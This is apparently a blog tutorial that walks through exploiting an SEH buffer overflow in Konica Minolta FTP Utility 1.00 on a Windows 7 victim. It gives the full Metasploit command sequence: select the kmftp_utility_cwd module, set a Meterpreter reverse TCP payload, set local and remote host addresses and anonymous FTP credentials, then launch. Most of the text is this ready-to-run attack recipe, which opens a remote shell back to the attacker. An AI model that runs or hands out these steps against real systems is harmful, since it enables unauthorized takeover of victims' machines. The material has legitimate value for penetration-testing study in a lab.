Exploit Windows PC using Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow

This module exploits an SEH overflow in Konica Minolta FTP Server 1.00. Konica Minolta FTP fails to check input size when parsing ‘CWD’ commands, which leads to an SEH overflow. Konica FTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability.

Exploit Targets

Konica Minolta FTP Server 1.00

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/ftp/kmftp_utility_cwd

msf exploit (kmftp_utility_cwd)>set payload windows/meterpreter/reverse_tcp

msf exploit (kmftp_utility_cwd)>set lhost 192.168.1.5 (IP of Local Host)

msf exploit (kmftp_utility_cwd)>set rhost 192.168.1.7

msf exploit (kmftp_utility_cwd)>set FTPUSER anonymous

msf exploit (kmftp_utility_cwd)>set FTPPASS raj

msf exploit (kmftp_utility_cwd)>exploit

Leave a Reply

Your email address will not be published. Required fields are marked *